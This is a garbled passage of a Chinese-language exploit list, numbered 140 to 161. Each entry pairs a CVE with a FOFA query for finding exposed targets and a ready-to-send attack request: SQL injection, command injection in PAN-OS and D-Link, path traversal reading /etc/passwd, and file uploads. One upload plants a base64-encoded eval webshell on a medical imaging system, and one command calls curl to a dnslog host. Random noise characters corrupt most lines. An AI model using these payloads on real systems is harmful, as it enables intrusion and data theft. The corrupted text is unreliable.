/ T: v5 O6 u5 {, iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 L& T; M# ?5 n0 k. YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; r8 y3 y$ j6 I1 T" M- i
Accept-Encoding: gzip, deflate, br
9 H2 [ G' E, o5 i4 ^0 z7 Q# ~Connection: close
' L2 T9 `8 c2 ACookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk" m6 D6 z) [" O5 k1 f
Upgrade-Insecure-Requests: 1
' s4 h2 a5 I$ I/ O
# H9 E* C' b$ S7 p& h5 S* J+ ]3 z; E% J- b g$ e0 r4 @
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
# B( m# O& a$ n UCVE-2024-2566, F. n, h* c. J5 D
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
B& ]4 t* B! g( }+ R% k& ?/ nGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
" z6 U" b0 R' g# _5 E4 f" Z7 kHost: x.x.x.x z K# i" s5 F. _# @' S% V4 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 a: D3 T( n; J! I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ N4 `2 J1 l! n' [% x# n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 g' l8 N* E- v0 ~: D. _& ?, `
Accept-Encoding: gzip, deflate, br, j5 F. W6 r: I: z" T
Connection: close& {5 a* \1 _: m: ?* I+ T# d
Cookie: authcode=h8g95 a9 p. ]! D1 \' ?% B; R. j
Upgrade-Insecure-Requests: 17 ~. k3 Q' y# N/ y E9 O9 h
: [( y6 U% k2 Y5 q8 Q& {4 ?" J- i% \3 X" D
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
: Q" p5 a5 ?( i' b1 f$ Y& uFOFA:body="指挥调度管理平台"
% x4 q: j1 A1 b7 A3 w; ~POST /app/ext/ajax_users.php HTTP/1.1: @) s5 a7 p, W! N W, n+ o/ E
Host: your-ip5 W' b' r# |, F& S
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info5 Z+ k1 k4 }; W9 x" T6 _3 v
Content-Type: application/x-www-form-urlencoded
# @5 r4 O6 ^# H- |& a
) x. C" \- g) ]% A- K
\ S% t0 _; l0 _) Rdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
1 R2 {' F% t. T! v6 u& ?1 ? S" Y1 M5 l* m) e7 o
) I4 o; r* P( C. \8 Z- a' S
142. CMSV6车辆监控平台系统中存在弱密码" I4 _8 Y: |- h' S1 c$ u2 A
CVE-2024-29666
# ^$ s& b3 r3 Y9 ?: Y" ~3 g. LFOFA:body="/808gps/"
( C3 |1 r5 C; D8 oadmin/admin- V, `9 R: A! B! r: y5 ^2 I7 {$ D
143. Netis WF2780 v2.1.40144 远程命令执行
$ [! f- A( F/ F; f/ eCVE-2024-258506 L8 R: o, r/ q1 Z" H5 e% U
FOFA:title='AP setup' && header='netis'$ Q9 v+ v- b- z$ _
PAYLOAD
% U" F- M1 F; J2 l
2 N4 h8 [) Z9 @144. D-Link nas_sharing.cgi 命令注入
5 E* H& q* J* A) Y$ fFOFA:app="D_Link-DNS-ShareCenter"
; m/ N1 O8 B w% S8 K' Isystem参数用于传要执行的命令+ O9 b/ c; I% g
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
R0 |. a7 ^( P$ u0 F$ J2 OHost: x.x.x.x
5 ?* V1 Z* ]8 l; c, \ DUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
' m& X8 U* h3 fConnection: close+ O. \+ R5 w2 l* \* u
Accept: */*" x5 x5 S* v& X% D* M7 c
Accept-Language: en8 }) I4 a& M3 l, Q. f7 m; ~7 D; o% R
Accept-Encoding: gzip
4 K/ f" _6 p, `7 W [1 S
3 O2 y; R0 }& N% r4 _3 n4 Z& Z; c6 C- R! K ?
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入2 p4 y4 R7 D" u8 J+ i. t
CVE-2024-3400
/ U2 S% O8 ]- G# I% ]FOFA:icon_hash="-631559155"
% ?' p: b$ y7 E7 z8 [2 T+ XGET /global-protect/login.esp HTTP/1.19 Y8 i7 }/ j1 x6 {4 C! ^: L, P! i
Host: 192.168.30.112:10056 p9 B v ?% {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
( \2 C3 u+ {- J d; c5 kConnection: close. w$ V! i' X& R- d( L- D
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
! i, q$ c% h3 O# A s5 K2 `7 GAccept-Encoding: gzip5 T8 G1 n; r( T* \, M& S& b: g
4 U% D& A [8 U/ ]& O! v6 Y
8 Z4 J' ?. V: N: ?) K' \146. MajorDoMo thumb.php 未授权远程代码执行9 s$ y( x. {& U0 M
CNVD-2024-021752 B9 S$ B+ W, T% o7 A# A
FOFA:app="MajordomoSL"
6 C- o0 L& I5 k. j/ {3 ?GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
$ Q( W5 E0 {0 b; RHost: x.x.x.x \5 Q3 r5 Q5 `! _7 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
2 ^" ?! Y @6 B& ^' }" QAccept-Charset: utf-8
4 m! X! {) U% L; V* I xAccept-Encoding: gzip, deflate
7 P+ ]$ `( c3 }2 JConnection: close
7 ?# p0 S" d1 z8 \1 L, y
V1 Q9 @+ f- |: C! M7 G* V
6 a5 `) d2 l* H7 e147. RaidenMAILD邮件服务器v.4.9.4-路径遍历! }1 r0 P3 R9 }
CVE-2024-32399% ?: z8 M" e3 M
FOFA:body="RaidenMAILD"- K4 Y; s$ d; d6 R
GET /webeditor/../../../windows/win.ini HTTP/1.10 W; O( j) I! C$ P8 v
Host: 127.0.0.1:81
8 L, G; r, }* g4 p6 ~Cache-Control: max-age=0 g8 R9 ` `1 T, z
Connection: close0 t @/ a4 i5 G
, a. V9 K) G5 M
! T n8 {$ y1 u# k! S% {8 |148. CrushFTP 认证绕过模板注入
8 {; X; q+ W5 x; l+ @) dCVE-2024-4040
- o7 L) Z; J* B( B4 _) `$ X) A% aFOFA:body="CrushFTP"
5 v4 e7 M" r5 \) tPAYLOAD
, s: \" `( N R) J. m! ^; I1 F; |' l r7 U
149. AJ-Report开源数据大屏存在远程命令执行/ x1 l; l' j+ @4 K: u, d# M. |
FOFA:title="AJ-Report"/ Z, D# o0 ^. n: U& ?; A V
: p' S7 P2 ?9 c% z# z9 uPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1+ K4 j$ Z9 M& W- l; z# D
Host: x.x.x.x
* z5 X9 G7 u) C# S6 H- rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 r1 ~% O' i. f6 c8 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 t! v( q# U( x0 ]3 ~, q/ Z
Accept-Encoding: gzip, deflate, br, W# h- S% u/ n2 V* I
Accept-Language: zh-CN,zh;q=0.9
* C7 G. u+ ^- s1 `: c( x+ OContent-Type: application/json;charset=UTF-8
3 H" P+ r. ]- _! C1 zConnection: close" k+ y/ }7 M$ D- C7 v0 I6 a+ h+ D
; s8 [& E2 Z2 A! k# k{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}" m5 {7 f3 J5 j# J! A+ W0 ?; x
. `$ t: q2 D9 X J1 D150. AJ-Report 1.4.0 认证绕过与远程代码执行, a7 T0 A1 {4 f) ] s
FOFA:title="AJ-Report"
/ i) N6 {6 L( k! v1 \+ {4 b# J; bPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
+ ?" e7 Z, ^) m6 N' c( V- tHost: x.x.x.x" c- [( J9 T2 f7 q$ b+ `6 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) k0 N+ C/ ?3 A: X7 G4 y. j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' p( F5 T0 F% V8 z
Accept-Encoding: gzip, deflate, br/ S; C/ a1 f4 n4 D2 |( I% g6 n
Accept-Language: zh-CN,zh;q=0.9
E; z" F1 G9 d, ]) s: FContent-Type: application/json;charset=UTF-8' |; p; y' o; e7 x4 L, P
Connection: close
# x A# M8 n' r/ a; b: hContent-Length: 339
; Y, x! [. S: P0 T9 p8 A
3 C" X, B4 a$ Q# a{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
% x* f. S! i, @( I% e, g$ Q
$ e; E& G: v- R; t8 H8 Y' {
$ R" R4 @2 n# T: ~* n, j% N1 M: n151. AJ-Report 1.4.1 pageList sql注入
/ a/ M, _! c" K! v6 u; w9 zFOFA:title="AJ-Report"
4 ^, ?9 i& A$ D8 i3 eGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.11 _5 b/ W# R; H
Host: x.x.x.x# F- @" ?" o+ _) {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 S3 y8 a# p+ Q1 N' lConnection: close6 v4 v% N: `$ @( h
Accept-Encoding: gzip$ @# _( Z( B5 I, c: k, H7 l6 {
5 O. J z6 ^' U0 ~
# J0 b! h. W' q7 L152. Progress Kemp LoadMaster 远程命令执行
1 J4 m/ l: N. D9 UCVE-2024-1212
7 b% F' o1 V, DLoadMaster <= 7.2.59.2 (GA)
1 r1 g. s1 n; Y: c, F8 E QLoadMaster<=7.2.54.8 (LTSF)
2 Y$ `, y' ?& ?" z/ ^3 dLoadMaster <= 7.2.48.10 (LTS)( }0 r: b$ g$ Z/ }+ W, y
FOFA:body="LoadMaster"
: _# l- \: q! ~6 A( Q, _JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
7 Q7 B; m$ w- g$ aGET /access/set?param=enableapi&value=1 HTTP/1.1
/ q, I( I6 N2 y9 C( r1 `Host: x.x.x.x
4 G) e! _- O" P, g" G/ M/ k/ ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
' I+ Q8 K: G) e0 a, CConnection: close
( ?8 K9 v% D, v' ~Accept: */*) p" u& a# X6 p, I" {
Accept-Language: en
, d8 X: W. Q0 ^+ \Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
# K! l' @; k4 o% V9 EAccept-Encoding: gzip1 E8 j x2 k7 N& _8 o) ~
8 ?* h! Q7 o9 K0 B
) l+ e& {# _6 s: ^/ `153. gradio任意文件读取
: c/ L7 z1 f6 M5 L$ g' X( p6 |9 t( fCVE-2024-1561FOFA:body="__gradio_mode__"" M6 B( r: f0 K0 M" v( N5 Q/ ]
第一步,请求/config文件获取componets的id
7 A" c, p# o6 s) Q5 Q* |" r8 Rhttp://x.x.x.x/config& K, F. m% g/ M* ?' N4 r% E( _( o4 |, Y
4 X6 C: [& G; v; J& `& a/ K
! D; [+ M; M2 X4 w
第二步,将/etc/passwd的内容写入到一个临时文件
* A% q. z; G' hPOST /component_server HTTP/1.15 Z3 p/ p; n/ c" q! [( v8 A
Host: x.x.x.x
/ u; a; N2 {1 N1 O3 N- CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3 b5 j E7 M! s0 C: P
Connection: close2 j+ x$ T: A, f% M6 j4 V* `* Z/ i( a: G
Content-Length: 115
T1 Q$ o6 z9 p( @Content-Type: application/json
6 Z6 S# {/ e5 v/ H' Q+ F$ |9 kAccept-Encoding: gzip% w0 B0 P8 T0 {, ^
- g; S* B, h) m9 z$ C" d! i{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}& ~' c+ m3 P5 @- {7 A Z; L
3 }7 i! G# m+ h" ?. \3 L
: a, _9 K3 e* e/ a& e) i第三步访问
9 y9 U3 J9 `" ^6 H3 chttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
8 T! {! |5 u# }- J- @
- G9 x c7 p) Z; h: S- g1 F( D3 v- y
154. 天维尔消防救援作战调度平台 SQL注入
w0 M- A/ U2 N$ d s- `* n" o* nCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"! h% h- k# `8 T0 d: m
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
, i7 {9 K7 s1 f4 I& f j, ~; Y$ K# OHost: x.x.x.x+ B9 a& x# d+ @3 p \' n7 e
Content-Length: 106
* M4 x' g& u% S7 gCache-Control: max-age=0
/ t, D2 H3 _# L/ ?8 D1 Q: qUpgrade-Insecure-Requests: 1
( l% Q5 _% Y; U1 @5 |Origin: http://x.x.x.x7 S% Z- r. F4 }- }: r2 g
Content-Type: application/json7 `% F! @0 R; H) R4 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.369 b3 u2 @4 ^/ w3 r" i9 a' j7 F8 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' J9 J- c. k0 Q1 fReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
( K9 o7 O3 }0 N& j! \Accept-Encoding: gzip, deflate/ A* h( x! D a/ O$ U7 M: Y
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
# ]; [2 v' d+ V4 z; w& KConnection: close
" Z4 H5 y# E: y5 f7 J+ ?- N9 A: c5 ~3 E; D5 u+ B7 @
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
a6 @' z: @" g) ?6 N+ @) j
3 V( D# \$ i( ^3 f# ]1 |6 Q$ [* ^* H$ z% ?" b. ?0 N
155. 六零导航页 file.php 任意文件上传
\3 ?5 {! L$ r) q$ j! gCVE-2024-34982
' o* g# w- j1 t4 ?FOFA:title=="上网导航 - LyLme Spage"
9 ^. k3 m# u3 ^. f. X7 n9 ^POST /include/file.php HTTP/1.1& k( E+ \" |4 Z; T0 C& g
Host: x.x.x.x) J: P5 z! I2 N2 B) l6 x0 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
: z! A* b" L* n- B0 \8 I3 ?Connection: close5 d' W8 U4 W: v5 P; l1 V) {1 ?
Content-Length: 232
0 @3 I- L' j5 u. F$ D; x# AAccept: application/json, text/javascript, */*; q=0.01
: |* S% w. R1 z# d& J- i/ eAccept-Encoding: gzip, deflate, br
1 D8 q: V1 \- WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 \3 X% ^* E" X6 h, t$ K; x( ~Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f( m q5 o- G- s) X8 g
X-Requested-With: XMLHttpRequest9 U/ u7 b; ^9 q! I* D
$ a7 n, h- L) U
-----------------------------qttl7vemrsold314zg0f4 s# \4 ]# E, M& F( i1 a
Content-Disposition: form-data; name="file"; filename="test.php"/ l5 \: d" e7 z/ o0 @. A
Content-Type: image/png- r6 W0 R( H4 B1 F! Z! E
0 v0 S4 J! l- f) K9 p' \$ V
<?php phpinfo();unlink(__FILE__);?>& g! _" k, @! ]* l, N5 S; Z
-----------------------------qttl7vemrsold314zg0f--
( O$ U% j/ C& W# i" x6 y9 x; f
) P& q4 u5 P/ |' ?
7 v" r0 Q: Q) z# S- \访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
! c; {+ j9 U) Q; k# U* y. q4 g* C% {7 B+ \# h
156. TBK DVR-4104/DVR-4216 操作系统命令注入 O% z; }: g; p: e
CVE-2024-3721/ A: e: Q; h" O F% ]' r5 V5 z
FOFA:"Location: /login.rsp"
+ ^& T5 u" R$ |·TBK DVR-4104
" K5 s# }2 s+ Y0 a·TBK DVR-4216 t2 J" `0 r: V2 `6 q S, I9 _
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"5 p6 ^- y" p% D9 G
, y2 X6 N8 y; c, Y$ ^/ J8 b9 ?
E( ~' [% R: U2 i3 u
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.12 J: ?' k) W J8 ]- N* m6 h+ d
Host: x.x.x.x
/ }) q, R2 R5 o) c5 n4 D% OUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) v1 d* M& T. K7 c! N1 L' D: f9 G% kConnection: close% c' C: l4 }2 s% A# E; Y3 a8 Z/ y: O
Content-Length: 0
2 R' u; H/ W) g4 k/ r, a HCookie: uid=12 m, u3 H2 r. O* h" W" Y
Accept-Encoding: gzip* J" A) L# R' [, M+ N; R' V, B
0 K( T+ i0 y5 |5 {) ]1 t
; w h& K J4 n0 s, k9 y9 e157. 美特CRM upload.jsp 任意文件上传
$ ` Z" ^* w% |+ x g1 R" B" Y4 A) uCNVD-2023-06971
$ A; u7 S( s1 R# n$ c5 Z% tFOFA:body="/common/scripts/basic.js"
1 Y, Y8 t- G8 Y; X- oPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.16 D. j8 Z; _/ K! Q' h
Host: x.x.x.x4 a+ @( J; l- \3 ?7 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36& y4 p ]6 A+ {8 n+ s
Content-Length: 709 ? l7 s# O+ ~/ i b2 P1 P' w. o4 @6 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! e( E1 Q3 o/ H/ x
Accept-Encoding: gzip, deflate, [2 a8 n& v6 A2 a
Accept-Language: zh-CN,zh;q=0.97 u `: X4 a4 x- A0 I( W% E
Cache-Control: max-age=0; M$ f, e; u/ y7 U m d; l9 D
Connection: close$ i3 a7 |: x y9 ?) N9 X0 j0 I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN5 p7 f5 W9 B$ T% L3 g
Upgrade-Insecure-Requests: 1
! D3 r) j o& Q" t( Q7 z% K
/ m/ }3 }, i7 s" j------WebKitFormBoundary1imovELzPsfzp5dN
; j) g0 Q. w* FContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
$ e' C! O/ n& a6 o( gContent-Type: application/octet-stream1 U5 E, Q6 C ?
; `. \+ p6 f9 m1 B, h- R0 `3 bnyhelxrutzwhrsvsrafb
- ^9 E+ L l) V S0 K) d------WebKitFormBoundary1imovELzPsfzp5dN; `8 c% I- C; r
Content-Disposition: form-data; name="key"& c. \: B+ i; u3 H: N
! C3 n2 P% C$ Z. ?null8 {; d3 H4 ]8 s/ n N
------WebKitFormBoundary1imovELzPsfzp5dN
' t3 a5 O- V) I% T! L6 K4 P5 B. V0 lContent-Disposition: form-data; name="form"
" ^+ p) ~8 ?3 s9 \/ h" D
5 B# {1 i: Y+ B2 a/ ~8 znull
) T! H) F4 ^' m( f6 }* d/ b------WebKitFormBoundary1imovELzPsfzp5dN; t9 u" e. {- q! X* M5 S
Content-Disposition: form-data; name="field"7 @, w/ k& O4 L$ o
. H r& H" z4 V0 ^
null, C- a$ O- v2 O- |
------WebKitFormBoundary1imovELzPsfzp5dN2 }, c" R: d9 r$ l3 T
Content-Disposition: form-data; name="filetitile"+ x/ o ^ e7 g8 t: o. p, [5 E) d
' O. n# x/ [/ {( K G B
null% [- k/ e0 ?# x" s; E+ k$ x
------WebKitFormBoundary1imovELzPsfzp5dN# {5 y! z+ R- A7 M3 y5 K" u
Content-Disposition: form-data; name="filefolder"
2 N3 J) c$ w6 _
! x l: U- j7 Lnull* F( t' {0 b$ x' C( S& B
------WebKitFormBoundary1imovELzPsfzp5dN--7 q+ J0 p; ~' z% t3 |# k
0 z! }5 v, Q. o/ P% b0 F0 t
. F" n5 A; s# _; W
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp) r1 Y: y* Z9 m. p$ @$ `* f; G
) }7 H# Z8 d9 q& w" \
158. Mura-CMS-processAsyncObject存在SQL注入
! D- }/ ~. O- @CVE-2024-32640
6 L3 |( O2 |6 @+ ^! {FOFA:"Generator: Masa CMS"2 C9 X! f0 u) y# p7 Y1 I* H
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1/ f# T( v0 }" I9 x. U
Host: {{Hostname}}
2 {, ?- W$ M3 l; Q$ ~2 Q$ T# ?Content-Type: application/x-www-form-urlencoded; O- |9 M8 `0 ~6 O) `! L; G
! K( T* ]2 p- g3 ?0 M* C
object=displayregion&contenthistid=x\'&previewid=1, V. h1 p3 b5 ]6 e# j
! a# x P$ G% s$ z5 A7 V
7 f" ]' [/ f. P* g9 c3 e. o: p
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
y" P6 ^% s( U) W w& a/ y7 O. ?FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")0 |5 O8 _; I0 Z j* B! ~. {
POST /webservices/WebJobUpload.asmx HTTP/1.11 G8 t* o$ {; ?$ {/ i
Host: x.x.x.x
$ N& d3 ?" H% cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
) ^$ Y' Z+ p+ j" q9 `0 ^# r# uContent-Length: 1080
1 {% C! l9 f: h, _; l: l t6 u& JAccept-Encoding: gzip, deflate
, H" E4 @0 h' G( M3 XConnection: close
) ^. O- d$ U$ r, t. _Content-Type: text/xml; charset=utf-8, U# p( f" P! \1 C9 w" [% ~1 Q
Soapaction: "http://rainier/jobUpload"
% V, d% K9 X% I, A+ p: A
1 h/ y# n/ z4 n9 Q* r<?xml version="1.0" encoding="utf-8"?>2 j" C' W v6 N F3 g- F! j
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
9 s& c* K# O# I! h<soap:Body>
0 z$ |: r; G0 h3 ~$ x' _" b<jobUpload xmlns="http://rainier">
- X; X9 u% ]0 V' g9 H<vcode>1</vcode>4 ]6 o/ v8 k8 Z! W1 U- G/ {
<subFolder></subFolder>
8 T- f0 j( N& M6 y2 X4 ]<fileName>abcrce.asmx</fileName>
0 W# x* h/ w& o6 M<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>" e1 Z4 r4 [4 s* P+ z
</jobUpload>
' C3 n6 w" M$ ?+ o1 R; j</soap:Body>) T) X& p- d* G8 I
</soap:Envelope>
4 a* B2 p8 I* d5 I
3 x3 s# U0 m# T# W: O2 S) c7 a$ \& ?8 H. [7 r+ a
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")3 w6 B/ U/ c. Q N4 Z! D& `0 h6 I
- g ?9 \+ V3 r9 i. _
2 J4 k+ @ y% D* L8 T9 r160. Sonatype Nexus Repository 3目录遍历与文件读取
$ B: M% i( z3 t9 aCVE-2024-4956
" ]/ ~1 j6 @9 P# q: WFOFA:title="Nexus Repository Manager") N9 f9 P2 t1 k _
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1. } T2 j" l" B4 W# j' u2 I
Host: x.x.x.x
/ \. p! a; S1 X+ v2 j, d0 G* A' rUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0 u3 _2 ~/ b; N, c, O0 W; d; b
Connection: close" R' Y" e- j5 }2 P
Accept: */*
2 W: f4 W2 l* x8 j% ]Accept-Language: en
' I( A4 T- m" Z9 G7 F' E7 x; EAccept-Encoding: gzip0 Q5 [* S* h s& |! K
8 o6 A0 \# `. G+ |
" A. k# q# C }" U6 q
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
( e H0 {% y5 cFOFA:body="/KT_Css/qd_defaul.css"/ K0 Q# N' m0 R& E- f
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密7 s/ @ T# M/ W8 [+ k
POST /Webservice.asmx HTTP/1.1& d {2 Z- s5 Q/ v
Host: x.x.x.x
: w7 s$ z: m# ?" Z& x7 ^3 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.365 r2 z, N- k7 L. i9 o2 P
Connection: close. i l6 ~8 P) U7 B: l) ]
Content-Length: 445) a: O+ d3 L0 x7 O
Content-Type: text/xml
8 A: Y* [* m9 O6 GAccept-Encoding: gzip; ]/ c, V t1 K& n
) ^; X5 H5 H+ W3 A( v) x
<?xml version="1.0" encoding="utf-8"?>6 e. b: k8 B: H; g+ I
<soap:Envelope xmlns:xsi="
) z5 E6 Z4 a* ?( x" ~- C Vhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"0 } g4 V; Y1 v }3 V
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
5 V7 r* t3 h0 U<soap:Body>
2 L# ]4 O% g0 z9 I! @5 W<UploadResume xmlns="http://tempuri.org/">
- J7 x2 P# H/ p7 `5 f2 b/ A$ B, I, H, _<ip>1</ip>
) S: w& p7 f, ^4 z+ d0 R' C<fileName>../../../../dizxdell.aspx</fileName>
2 ~* s4 l0 o8 E ^<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
& h+ H3 x2 e) c+ g$ a8 }9 L<tag>3</tag>
2 N! W% S8 @# W3 W</UploadResume>
/ n$ A1 g5 G4 B3 D& w</soap:Body>, O4 K. T+ A9 Q' k& E( x
